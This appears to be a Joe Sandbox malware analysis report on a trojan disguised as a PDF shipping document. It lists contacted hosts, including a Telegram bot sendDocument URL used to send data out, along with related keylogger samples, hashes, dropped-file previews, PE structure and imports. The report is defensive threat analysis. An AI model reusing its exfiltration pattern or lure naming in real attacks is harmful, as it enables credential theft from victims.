http://checkip.dyndns.orgX	RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	RegSvcs.exe, 00000002.00000002.879675121.0000000000918000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot-/sendDocument?chat_id=	Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	Shipment Document BL,INV and packing list.pdf.exe, 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.879714743.00000000020A2000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.112.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
132.226.247.73	unknown	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1640472
Start date and time:	2025-03-17 11:08:42 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Shipment Document BL,INV and packing list.pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@5/3
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:09:36	API Interceptor	10208788x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	sryxen-built.exe	Get hash	malicious	Unknown	Browse
	HSBC01703025_PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	QUOTATION#0033546.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Teklif Talebi #U0130hale No-14990_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	BOM N012-001 231109.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	shipment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SpotifyStartupTask.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Crack2025.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
104.21.112.1	#$43557.exe	Get hash	malicious	FormBook	Browse	www.nolae-eu.shop/11jg/
	BID_TERMS.EXE.exe	Get hash	malicious	FormBook	Browse	www.meshki-co-uk.shop/mzlg/
	SfF8tFQ11f.exe	Get hash	malicious	Unknown	Browse	cpvnxker.xyz/headimage.jpg
	Urgent Purchase Order.vbe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/6m32/
	CQDNwLUdY4.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/2dxw/
	sY8Sfsplzf.exe	Get hash	malicious	FormBook	Browse	www.enoughmoney.online/z9gb/?TF-P7=zR3cIyonFbUCfX4wpKNWKHtg5/zg1+YcnXRNJ+yYPjA6661hsBw23FkDfEgtp7rlWUxdaFu+U4x0i75BG7d41DR1Eot6cYC6DrNKmQYa+SmymwWTrA==&Pv5=thT0rvC
	gbdXRnNKkm.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/a669/
	JOB NO. AIQ8478.bat.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	jzqc1V4NqB.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/a669/?WBuDj=rwARXV5iz9NY7lD2nse3mpYvX8mI8lq4kwoE5vm7VO31wBaqesAJuHozl9YZ6Ede+IkifZaE/LHkIUXetab9qlITGUdXxZLx5IMa8uxv5i9osOS22A==&Jzwht=FNiD
	CP07E1clp1.exe	Get hash	malicious	FormBook	Browse	www.fz977.xyz/406r/
132.226.247.73	BANK SLIP-CTM PDA.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	BOM N012-001 231109.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	iCgb4kAWFh.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	QUOTATION_MARQUOTE312025PDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	checkip.dyndns.org/
	SHIPPING DOCS.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SOA FEB 2025.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	DON.ps1	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	INV000001203.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Statement FEB 2025pdf.com.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	HSBC01703025_PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	BANK SLIP-CTM PDA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	QUOTATION#0033546.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	Teklif Talebi #U0130hale No-14990_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	BOM N012-001 231109.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.64.1
	PT Inquiry.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	shipment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	order confirmation.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
api.telegram.org	sryxen-built.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	HSBC01703025_PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION#0033546.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Teklif Talebi #U0130hale No-14990_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	BOM N012-001 231109.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	shipment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SpotifyStartupTask.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	Crack2025.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
checkip.dyndns.com	HSBC01703025_PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	BANK SLIP-CTM PDA.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	QUOTATION#0033546.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Teklif Talebi #U0130hale No-14990_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	BOM N012-001 231109.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	PT Inquiry.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	shipment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	order confirmation.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	sryxen-built.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	HSBC01703025_PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION#0033546.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Teklif Talebi #U0130hale No-14990_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	BOM N012-001 231109.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	shipment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
UTMEMUS	HSBC01703025_PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	BANK SLIP-CTM PDA.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	BOM N012-001 231109.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	shipment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.8.169
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.8.169
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.8.169
	iCgb4kAWFh.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.247.73
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.247.73
CLOUDFLARENETUS	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.64.1
	XClient.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	https://nwsyork.lamboi.xyz/HnBTHlrQ#parts@foster-uk.com	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.16.6.189
	https://www.swpinovalab.com.br/admin/ees.php	Get hash	malicious	HTMLPhisher	Browse	104.16.123.96
	WizClient.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.20.3.235
	#$43557.exe	Get hash	malicious	FormBook	Browse	104.21.112.1
	Invoice 1425004091.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	DHL_AWB#907853880911.exe	Get hash	malicious	FormBook	Browse	104.21.45.179
	HSBC01703025_PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	BANK SLIP-CTM PDA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	INV000001203.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	QUOTATION_MARQUOTE312025#U00faPDF.scr	Get hash	malicious	MSIL Logger	Browse	104.21.112.1
	QUOTATION_FEBQUOTE312025#U00faPDF.scr	Get hash	malicious	MSIL Logger	Browse	104.21.112.1
	QUOTATION_FEBQUOTE312025#U00faPDF.scr	Get hash	malicious	MSIL Logger	Browse	104.21.112.1
	akXjj2a58b.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	QUOTATION_JANQUOTE312025#U00faPDF.scr	Get hash	malicious	MSIL Logger	Browse	104.21.112.1
	VV9lrCk7LE.BAT	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	CUST543324_invoice.pdf.scr	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	QUOTATION_JANQUOTE312025#U00faPDF.scr	Get hash	malicious	Unknown	Browse	104.21.112.1
	24602711 OR Invoice.pdf.scr	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
36f7277af969a6947a61ae0b815907a1	INV000001203.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	akXjj2a58b.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	1cRfGAFurK.vbs	Get hash	malicious	Remcos, GuLoader, MailPassView	Browse	149.154.167.220
	Sample.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	Cot90012ARCACONTAL.xls	Get hash	malicious	Remcos	Browse	149.154.167.220
	invoice09850.xls	Get hash	malicious	Remcos	Browse	149.154.167.220
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2024-HRDCL-0000796.xls	Get hash	malicious	Unknown	Browse	149.154.167.220
	2024-HRDCL-0000796.xls	Get hash	malicious	Unknown	Browse	149.154.167.220
	DHL Shipment DOCs_002.xls	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	93696
Entropy (8bit):	6.914527220484985
Encrypted:	false
SSDEEP:	1536:kZ9NWJT5fkWG9CKDkqTdCXzkDfiCKzMeb45fwUjwkvvU+aT8rIjnPg4ujeOkk:kZXWJ9ZNMdUDURWzk51vcOkPg4+eq
MD5:	21C7393E0CEB68F93247A94F120D159C
SHA1:	9D5E4FFBB467FB223EC92F8828C149BD4F94C1C5
SHA-256:	69A3507E33BEF2B15CBD9CFE604D1A040D24B41EAD1D20C7FE6E272FAC2E3F57
SHA-512:	42116223605AB76376719F84847D91E89E5DD0FC8F797A1C565D3F6478AD764FCCCD02D239DC2FE2CF232542E440B02660D8B8B172C11B95B9DCE18152E80AAF
Malicious:	false
Reputation:	low
Preview:	tk.T@75BJ3ZD..BS.U0M13GB.EK91UTC75BN3ZDWLBSNU0M13GBQEK91UTC7.BN3T[.BB.G...0..c.-"J.%&,PG##.9%9"-'n7UmCF)b8+k}~.t.XQ'`>WNsLBSNU0MavGB.DH9.;..75BN3ZDW.BQO^1.13#CQEC91UTC7K.O3ZdWLB.OU0Mq3GbQEK;1UPC75BN3ZBWLBSNU0M.2GBSEK91UTA7U.N3JDW\BSNU M1#GBQEK9!UTC75BN3ZDWd.RN.0M13.CQ.N91UTC75BN3ZDWLBSNU0.03KBQEK91UTC75BN3ZDWLBSNU0M13GBQEK91UTC75BN3ZDWLBSNU0M1.GBYEK91UTC75BN;zDW.BSNU0M13GBQk?\I!TC7. O3ZdWLB7OU0O13GBQEK91UTC75bN3:j%?00NU0.43GB.DK97UTCQ4BN3ZDWLBSNU0Mq3G..7.U^6TC;5BN3.EWL@SNU\L13GBQEK91UTC7uBNqZDWLBSNU0M13GBQE+.0UTC75.N3ZFWIB..U0..3GAQEKc1UR..5B.3ZDWLBSNU0M13GBQEK91UTC75BN3ZDWLBSNU0M13GBQ.6.>..^F.3ZDWLBRLV4K9;GBQEK91U*C75.N3Z.WLBdNU0h13G/QEK.1UT=75B03ZD3LBS<U0MP3GB.EK9^UTCY5BNMZDWR@{QU0G..G@yeK9;U~.D.BN9.EWLF lU0G.1GBU6h91_.@75F=.ZD].FSNQCh13M.TEK=..T@.#DN3A+oLBYNV.X73GY{cK;.lTC=5hh3Y.BJBSU..M3.NBQAaoBHTC1..N3P0^LBQ._0M5.Y@y.K9;.v=$5BJ.Znu2VSNQ.M..9WQEO.1.v=!5BJ.Znu2USNQ.M.5m Q7.51%W,V5BH..DWFj.NU6M..G<_EK=3:.C7?dd.Zl.LBUN}fM15Gj.EK?1}.C73BffZDQLhiN}`M15Gj.EK?1..CI.BN7vC).BSJ~&3.3GF.C39

C:\Users\user\AppData\Local\Temp\aut6E2E.tmp

Download File

Process:	C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	69206
Entropy (8bit):	7.923910436166648
Encrypted:	false
SSDEEP:	1536:8tIkrTIBniMh03U7gKsqv+2cOm6O1TACd8pL2kWyyizdDm4:8VTIRiMh0ssqv+bOm6O1TACd8psbUDm4
MD5:	1A8D92684921C0F01E8A7D37852EA386
SHA1:	C677F5828F61D44F02BB2A36615555DB4723233E
SHA-256:	C32FC74BFBF2E98D049DD92B28E05C7DFE07B2F788051D05B50F45FD116DA8FA
SHA-512:	1B4BFF6FD955852F330887E58CBAF95979FA654E1D4AB5C8F9BA1B07D5C0B54378276CA9369832E9A7250D26450AFA091B91023E7BE0CD09D2FE015FC3C38F20
Malicious:	false
Reputation:	low
Preview:	EA06..n..Z..J..kB.L.TMF.S.Uf...B..is..V.C..)..e^.B....Q.....l.V........f..U..-.R.2Y4..G...s.,.E-...[m..).N%v....t.V2{...N..(..v...JD..;.\|..5..Ti..vc3...4Z..f)\|.\|.d..>t..b.3..!...P......]....S....oU..t.%^..6.).....$ ...pT.0....pt..?..0...<.......Q:=...7...W...v.?.Rd .f.@......O.Q.lT...%..&....h.6\|h.....l....>.........R.;..sTZ.2..6W)..?..N..^.r.......(.j.&...Uf....A.6,s..K...........qg.>..F..@..R.U.......R..b..lA... ..h.6%..dt.D..(...bf..O..J.....6+...d....(...U.Q.qZ=..e.X..m.)B.N{@.e.Al..63.=..6.Nf5....F...TJ.2.S.Th`..7.T...}R...).:...L.Vi.nubo3..ov:\.3l.P.[E.gY.P.T.V.....t..F.a...J..;..L....2.Q.W...f.@...!...{$.E#..u.eV.l#t..FsW..i.)...!...T.o.[l..7..f2Z...5.R#..%^.j...jln.G.W.(....C...M.j...P....1...P-..1..(sy...f.Q4.E..}..........`.*t..C...U:U.M3.L..m}.g9......k..h.zE..N.........Q...5..E.G@!...B..lv. ......Z...R....o..>R.s)E..7..)T...h......gC.M@.H.^...l).%..u.T.....3..:7J\.k..P..p.......uViO...+..cW.U.SZ.2cY...y..M..gQp.Bw'.@.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.858484049794402
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Shipment Document BL,INV and packing list.pdf.exe
File size:	971'776 bytes
MD5:	5fd799c047c81a8efb15d9a32f1d8e39
SHA1:	fe01653460b4435266a8d3a3bdab26def6a9b2f7
SHA256:	ffac68d784d7cd99536b0664ff0a765371c8bf0d0836fce71fa8a29afa9cb5c3
SHA512:	71e97cda9b0c205be029726c6c280afedcfacf92f324734945d622f2112e259f85b29cf6745455cca2aad39734257ac05cf43c6576c732d0ab3c2f7fd1fd79d0
SSDEEP:	24576:xu6J33O0c+JY5UZ+XC0kGso6Fa5ZzQ5N8yWY:ju0c++OCvkGs9Fa55Q5qY
TLSH:	0925AE2273DDC360CB669173BF69B7016EBF3C614630B85B2F980D7DA950162262D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67D76614 [Mon Mar 17 00:00:20 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F256C7CD14Ah
jmp 00007F256C7BFF14h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F256C7C009Ah
cmp edi, eax
jc 00007F256C7C03FEh
bt dword ptr [004C31FCh], 01h
jnc 00007F256C7C0099h
rep movsb
jmp 00007F256C7C03ACh
cmp ecx, 00000080h
jc 00007F256C7C0264h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F256C7C00A0h
bt dword ptr [004BE324h], 01h
jc 00007F256C7C0570h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F256C7C023Dh
test edi, 00000003h
jne 00007F256C7C024Eh
test esi, 00000003h
jne 00007F256C7C022Dh
bt edi, 02h
jnc 00007F256C7C009Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F256C7C00A3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F256C7C00F5h
bt esi, 03h
jnc 00007F256C7C0148h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x24b28	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xec000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x24b28	0x24c00	d9fe10679bd9771d4e7edde00484457d	False	0.8208904655612245	data	7.6000179710571585	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xec000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x1bded	data			1.000359154497753
RT_GROUP_ICON	0xeb5a8	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xeb620	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xeb634	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xeb648	0x14	data	English	Great Britain	1.25
RT_VERSION	0xeb65c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xeb738	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
